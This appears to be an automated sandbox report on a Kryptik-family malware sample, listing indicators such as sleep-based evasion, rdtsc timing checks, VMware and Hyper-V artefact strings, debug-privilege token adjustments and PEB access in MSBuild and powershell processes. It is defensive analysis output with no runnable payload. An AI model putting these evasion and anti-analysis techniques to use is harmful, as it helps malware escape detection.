                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe TID: 4620Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4212Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 4764Thread sleep time: -65000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D6B90 rdtsc 3_2_010D6B90
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9197Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 8.4 %
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029C3170 FindFirstFileW,FindNextFileW,FindClose,7_2_029C3170
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029C3169 FindFirstFileW,FindNextFileW,FindClose,7_2_029C3169
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: explorer.exe, 00000004.00000000.446744428.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                Source: explorer.exe, 00000004.00000000.446953302.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
                Source: explorer.exe, 00000004.00000000.440440889.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
                Source: explorer.exe, 00000004.00000000.408936128.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000004.00000000.449595859.000000000CDEC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
                Source: rundll32.exe, 00000007.00000002.829692359.00000000002E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWS
                Source: explorer.exe, 00000004.00000000.469918942.0000000008590000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: rundll32.exe, 00000007.00000002.833510725.0000000006F6F000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.828395170.000000000020A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000004.00000000.446744428.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.387423359.000000000154F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D6B90 rdtsc 3_2_010D6B90
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A9100 mov eax, dword ptr fs:[00000030h]3_2_010A9100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A9100 mov eax, dword ptr fs:[00000030h]3_2_010A9100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A9100 mov eax, dword ptr fs:[00000030h]3_2_010A9100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4120 mov eax, dword ptr fs:[00000030h]3_2_010C4120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4120 mov eax, dword ptr fs:[00000030h]3_2_010C4120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4120 mov eax, dword ptr fs:[00000030h]3_2_010C4120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4120 mov eax, dword ptr fs:[00000030h]3_2_010C4120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4120 mov ecx, dword ptr fs:[00000030h]3_2_010C4120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D513A mov eax, dword ptr fs:[00000030h]3_2_010D513A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D513A mov eax, dword ptr fs:[00000030h]3_2_010D513A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CB944 mov eax, dword ptr fs:[00000030h]3_2_010CB944
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CB944 mov eax, dword ptr fs:[00000030h]3_2_010CB944
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AC962 mov eax, dword ptr fs:[00000030h]3_2_010AC962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AB171 mov eax, dword ptr fs:[00000030h]3_2_010AB171
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AB171 mov eax, dword ptr fs:[00000030h]3_2_010AB171
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DA185 mov eax, dword ptr fs:[00000030h]3_2_010DA185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CC182 mov eax, dword ptr fs:[00000030h]3_2_010CC182
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D2990 mov eax, dword ptr fs:[00000030h]3_2_010D2990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011251BE mov eax, dword ptr fs:[00000030h]3_2_011251BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011251BE mov eax, dword ptr fs:[00000030h]3_2_011251BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011251BE mov eax, dword ptr fs:[00000030h]3_2_011251BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011251BE mov eax, dword ptr fs:[00000030h]3_2_011251BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D61A0 mov eax, dword ptr fs:[00000030h]3_2_010D61A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D61A0 mov eax, dword ptr fs:[00000030h]3_2_010D61A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011269A6 mov eax, dword ptr fs:[00000030h]3_2_011269A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AB1E1 mov eax, dword ptr fs:[00000030h]3_2_010AB1E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AB1E1 mov eax, dword ptr fs:[00000030h]3_2_010AB1E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AB1E1 mov eax, dword ptr fs:[00000030h]3_2_010AB1E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011341E8 mov eax, dword ptr fs:[00000030h]3_2_011341E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01174015 mov eax, dword ptr fs:[00000030h]3_2_01174015
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01174015 mov eax, dword ptr fs:[00000030h]3_2_01174015
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01127016 mov eax, dword ptr fs:[00000030h]3_2_01127016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01127016 mov eax, dword ptr fs:[00000030h]3_2_01127016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01127016 mov eax, dword ptr fs:[00000030h]3_2_01127016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D002D mov eax, dword ptr fs:[00000030h]3_2_010D002D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D002D mov eax, dword ptr fs:[00000030h]3_2_010D002D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D002D mov eax, dword ptr fs:[00000030h]3_2_010D002D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D002D mov eax, dword ptr fs:[00000030h]3_2_010D002D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D002D mov eax, dword ptr fs:[00000030h]3_2_010D002D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BB02A mov eax, dword ptr fs:[00000030h]3_2_010BB02A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BB02A mov eax, dword ptr fs:[00000030h]3_2_010BB02A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BB02A mov eax, dword ptr fs:[00000030h]3_2_010BB02A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BB02A mov eax, dword ptr fs:[00000030h]3_2_010BB02A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C0050 mov eax, dword ptr fs:[00000030h]3_2_010C0050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C0050 mov eax, dword ptr fs:[00000030h]3_2_010C0050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01171074 mov eax, dword ptr fs:[00000030h]3_2_01171074
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01162073 mov eax, dword ptr fs:[00000030h]3_2_01162073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A9080 mov eax, dword ptr fs:[00000030h]3_2_010A9080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01123884 mov eax, dword ptr fs:[00000030h]3_2_01123884
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01123884 mov eax, dword ptr fs:[00000030h]3_2_01123884
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E90AF mov eax, dword ptr fs:[00000030h]3_2_010E90AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D20A0 mov eax, dword ptr fs:[00000030h]3_2_010D20A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D20A0 mov eax, dword ptr fs:[00000030h]3_2_010D20A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D20A0 mov eax, dword ptr fs:[00000030h]3_2_010D20A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D20A0 mov eax, dword ptr fs:[00000030h]3_2_010D20A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D20A0 mov eax, dword ptr fs:[00000030h]3_2_010D20A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D20A0 mov eax, dword ptr fs:[00000030h]3_2_010D20A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DF0BF mov ecx, dword ptr fs:[00000030h]3_2_010DF0BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DF0BF mov eax, dword ptr fs:[00000030h]3_2_010DF0BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DF0BF mov eax, dword ptr fs:[00000030h]3_2_010DF0BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0113B8D0 mov eax, dword ptr fs:[00000030h]3_2_0113B8D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0113B8D0 mov ecx, dword ptr fs:[00000030h]3_2_0113B8D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0113B8D0 mov eax, dword ptr fs:[00000030h]3_2_0113B8D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0113B8D0 mov eax, dword ptr fs:[00000030h]3_2_0113B8D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0113B8D0 mov eax, dword ptr fs:[00000030h]3_2_0113B8D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0113B8D0 mov eax, dword ptr fs:[00000030h]3_2_0113B8D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A58EC mov eax, dword ptr fs:[00000030h]3_2_010A58EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116131B mov eax, dword ptr fs:[00000030h]3_2_0116131B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010ADB40 mov eax, dword ptr fs:[00000030h]3_2_010ADB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01178B58 mov eax, dword ptr fs:[00000030h]3_2_01178B58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AF358 mov eax, dword ptr fs:[00000030h]3_2_010AF358
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010ADB60 mov ecx, dword ptr fs:[00000030h]3_2_010ADB60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D3B7A mov eax, dword ptr fs:[00000030h]3_2_010D3B7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D3B7A mov eax, dword ptr fs:[00000030h]3_2_010D3B7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B1B8F mov eax, dword ptr fs:[00000030h]3_2_010B1B8F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B1B8F mov eax, dword ptr fs:[00000030h]3_2_010B1B8F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0115D380 mov ecx, dword ptr fs:[00000030h]3_2_0115D380
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D2397 mov eax, dword ptr fs:[00000030h]3_2_010D2397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116138A mov eax, dword ptr fs:[00000030h]3_2_0116138A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DB390 mov eax, dword ptr fs:[00000030h]3_2_010DB390
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D4BAD mov eax, dword ptr fs:[00000030h]3_2_010D4BAD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D4BAD mov eax, dword ptr fs:[00000030h]3_2_010D4BAD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D4BAD mov eax, dword ptr fs:[00000030h]3_2_010D4BAD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01175BA5 mov eax, dword ptr fs:[00000030h]3_2_01175BA5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011253CA mov eax, dword ptr fs:[00000030h]3_2_011253CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011253CA mov eax, dword ptr fs:[00000030h]3_2_011253CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CDBE9 mov eax, dword ptr fs:[00000030h]3_2_010CDBE9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D03E2 mov eax, dword ptr fs:[00000030h]3_2_010D03E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D03E2 mov eax, dword ptr fs:[00000030h]3_2_010D03E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D03E2 mov eax, dword ptr fs:[00000030h]3_2_010D03E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D03E2 mov eax, dword ptr fs:[00000030h]3_2_010D03E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D03E2 mov eax, dword ptr fs:[00000030h]3_2_010D03E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D03E2 mov eax, dword ptr fs:[00000030h]3_2_010D03E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116AA16 mov eax, dword ptr fs:[00000030h]3_2_0116AA16
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116AA16 mov eax, dword ptr fs:[00000030h]3_2_0116AA16
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B8A0A mov eax, dword ptr fs:[00000030h]3_2_010B8A0A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C3A1C mov eax, dword ptr fs:[00000030h]3_2_010C3A1C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A5210 mov eax, dword ptr fs:[00000030h]3_2_010A5210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A5210 mov ecx, dword ptr fs:[00000030h]3_2_010A5210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A5210 mov eax, dword ptr fs:[00000030h]3_2_010A5210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A5210 mov eax, dword ptr fs:[00000030h]3_2_010A5210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AAA16 mov eax, dword ptr fs:[00000030h]3_2_010AAA16
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AAA16 mov eax, dword ptr fs:[00000030h]3_2_010AAA16
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E4A2C mov eax, dword ptr fs:[00000030h]3_2_010E4A2C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E4A2C mov eax, dword ptr fs:[00000030h]3_2_010E4A2C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116EA55 mov eax, dword ptr fs:[00000030h]3_2_0116EA55
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01134257 mov eax, dword ptr fs:[00000030h]3_2_01134257
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A9240 mov eax, dword ptr fs:[00000030h]3_2_010A9240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A9240 mov eax, dword ptr fs:[00000030h]3_2_010A9240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A9240 mov eax, dword ptr fs:[00000030h]3_2_010A9240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A9240 mov eax, dword ptr fs:[00000030h]3_2_010A9240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E927A mov eax, dword ptr fs:[00000030h]3_2_010E927A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0115B260 mov eax, dword ptr fs:[00000030h]3_2_0115B260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0115B260 mov eax, dword ptr fs:[00000030h]3_2_0115B260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01178A62 mov eax, dword ptr fs:[00000030h]3_2_01178A62
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DD294 mov eax, dword ptr fs:[00000030h]3_2_010DD294
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DD294 mov eax, dword ptr fs:[00000030h]3_2_010DD294
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A52A5 mov eax, dword ptr fs:[00000030h]3_2_010A52A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A52A5 mov eax, dword ptr fs:[00000030h]3_2_010A52A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A52A5 mov eax, dword ptr fs:[00000030h]3_2_010A52A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A52A5 mov eax, dword ptr fs:[00000030h]3_2_010A52A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A52A5 mov eax, dword ptr fs:[00000030h]3_2_010A52A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BAAB0 mov eax, dword ptr fs:[00000030h]3_2_010BAAB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BAAB0 mov eax, dword ptr fs:[00000030h]3_2_010BAAB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DFAB0 mov eax, dword ptr fs:[00000030h]3_2_010DFAB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D2ACB mov eax, dword ptr fs:[00000030h]3_2_010D2ACB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D2AE4 mov eax, dword ptr fs:[00000030h]3_2_010D2AE4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01178D34 mov eax, dword ptr fs:[00000030h]3_2_01178D34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0112A537 mov eax, dword ptr fs:[00000030h]3_2_0112A537
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116E539 mov eax, dword ptr fs:[00000030h]3_2_0116E539
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D4D3B mov eax, dword ptr fs:[00000030h]3_2_010D4D3B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D4D3B mov eax, dword ptr fs:[00000030h]3_2_010D4D3B
